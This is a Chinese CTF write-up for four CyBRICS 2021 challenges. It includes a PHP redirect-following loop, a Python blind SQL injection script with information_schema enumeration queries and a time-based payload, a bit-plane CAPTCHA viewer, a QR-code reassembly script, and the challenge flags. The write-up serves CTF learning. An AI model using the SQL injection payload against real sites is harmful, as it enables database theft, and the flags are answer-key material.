web

Ad NetWork

重定向套娃

究极无敌有点烦之重定向套娃,写个脚本让它自己跑算了,用curl会舒服点。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
$url = "http://dream.adnetwork-cybrics2021.ctf.su/bit-wait-admit-artist-deal/might-inside-toward-suddenly-watch/rich-outside-arrive/character-possible-easy";

while(1) {
    echo $url . "\n";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_TIMEOUT_MS,3000);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $output = curl_exec($ch);
    if($output === false) {
        if (curl_errno($ch) == CURLE_OPERATION_TIMEDOUT) {
            curl_close($ch);
            continue;
        }
    }
    echo $output;
    curl_close($ch);
    $url = explode('"', $output)[1];
}

爆到1337就能出flag了。

cybrics{f0lL0w_RUl3Z_F0ll0W_r3d1r3C7z}

Announcement

简单sql注入

基本没ban什么东西,但是要注意一下需要md5编码,直接写脚本盲注。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import requests
from hashlib import md5

url = "http://announcement-cybrics2021.ctf.su/"
# sql = "select database()"  # announcement
# sql = "select group_concat(table_name) from information_schema.tables where table_schema = database()"  # emails,logs
# sql = "select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'emails'"  # email,id,timestamp
# sql = "select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'logs'"  # log
sql = "select * from logs"  # flag  cybrics{1N53r7_0ld_900d_5ql}
result = ""

for i in range(1, 100):
    left = 32
    right = 128
    while left < right:
        mid = int((left + right - 1) / 2)
        payload = f"' or if((ascii(substr(({sql}),{i},1))>{mid}),1,cot(0)), NOW()) #"
        data = {
            "digest": md5(payload.encode('utf-8')).hexdigest(),
            "email": payload
        }
        res = requests.post(url=url, data=data)
        if "cot" in res.text:
            right = mid
        else:
            left = mid + 1
        # print(f"[*]New left is: {left} and right is: {right}")
    result += chr(int((left + right) / 2))
    print(f"[+]Result new is: {result}")

爆出flag

cybrics{1N53r7_0ld_900d_5ql}

misc

CAPTCHA The Flag

每张图片都是改过LSB的,用Stegsolve就可以看到CAPTCHA,然后一个一个输就行了。(应该有更加便捷的解法,我这纯属莽

赛后卓哥给了个分解颜色的python交互式脚本,实在是太妙了,感觉自己还是有很多对于misc的知识点不大明白的(还需提升

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import httpx as requests
import numpy as np
from PIL import Image

# bit planes codes are from https://medium.com/@stephanie.werli/image-steganography-with-python-83381475da57
# Interactive Script

session = requests.Client(proxies={
    "http://": "http://127.0.0.1:7890",
    "https://": "http://127.0.0.1:7890",
})
while True:
    image = session.get("https://captf-cybrics2021.ctf.su/captcha.php").content
    file = open("./tmp.png", "wb")
    file.write(image)
    file.close()

    data = np.array(Image.open("./tmp.png", "r"))
    out = []
    for k in range(7, -1, -1):
        res = data // 2 ** k & 1
        out.append(res * 255)
    b = np.hstack(out)
    Image.fromarray(b).show()

    captcha = input("Enter the captcha you have seen in the window:")
    try:
        response = session.post("https://captf-cybrics2021.ctf.su/", data={"answer": f"{captcha}"})
    except:
        print(f"[*] Hand up failed.")
        continue
    print(f"[+] Handed up {captcha} with response {response.content.decode()}")

Scanner

二维码拼接类型题

写个脚本复原就行了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from PIL import Image

nl = 0
newImage = Image.new("RGB", (989, 162), "white")

for i in range(8, 145, 3):
    print("[+]New is: ./gif/IMG00%03d.bmp" % i)
    image = Image.open(('./gif/IMG00%03d.bmp' % i))
    splice = image.crop((46, 496, 1036, 502))
    newImage.paste(splice, (0, nl))
    nl += 6

newImage = newImage.resize((500, 500))
newImage.save("flag.png")

最后一张是个二维码,扫一扫出flag。

cybrics{N0w_Y0u_4r3_4_c4sh13r_LOL}